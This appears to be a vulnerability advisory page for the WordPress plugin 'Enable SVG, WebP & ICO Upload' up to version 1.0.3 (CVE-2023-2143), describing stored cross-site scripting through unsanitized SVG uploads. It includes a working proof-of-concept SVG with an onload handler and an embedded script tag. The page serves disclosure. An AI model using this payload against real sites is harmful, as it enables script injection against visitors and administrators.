Lucene search
Mateus Machado TesserWPEX-ID:91898762-AA7D-4FBC-A016-3DE48901E5DEHistoryJun 23, 2023 - 12:00 a.m.
Enable SVG, WebP & ICO Upload <= 1.0.3 - Author+ Stored XSS
2023-06-2300:00:00
Mateus Machado Tesser
54
svg upload
webp upload
ico upload
stored xss
exploit
frontend_alerts
0.0005 Low
EPSS
Percentile
17.9%
The plugin does not sanitize SVG file contents, leading to a Cross-Site Scripting vulnerability.
1. Upload an SVG file with the following contents.
2. View the SVG file on the frontend and see the alerts.
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg
onload="javascript:alert(/XSS/)"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:cc="http://creativecommons.org/ns#"
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:svg="http://www.w3.org/2000/svg"
xmlns="http://www.w3.org/2000/svg"
xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd"
xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape"
id="svg3013"
sodipodi:docname="download_font_awesome.svg">
<script>alert(/XSS2/)</script>
</svg>Related
wpvulndb
wpvulndb
Enable SVG, WebP & ICO Upload <= 1.0.3 - Author+ Stored XSS
2023-06-23 00:00:00
prion
prion
Cross site scripting
2023-07-17 14:15:00
cvelist
cvelist
CVE-2023-2143 Enable SVG, WebP & ICO Upload <= 1.0.3 - Author+ Stored XSS
2023-07-17 13:29:52
cve
cve
CVE-2023-2143
2023-07-17 14:15:09
nvd
nvd
CVE-2023-2143
2023-07-17 14:15:09
wordfence
wordfence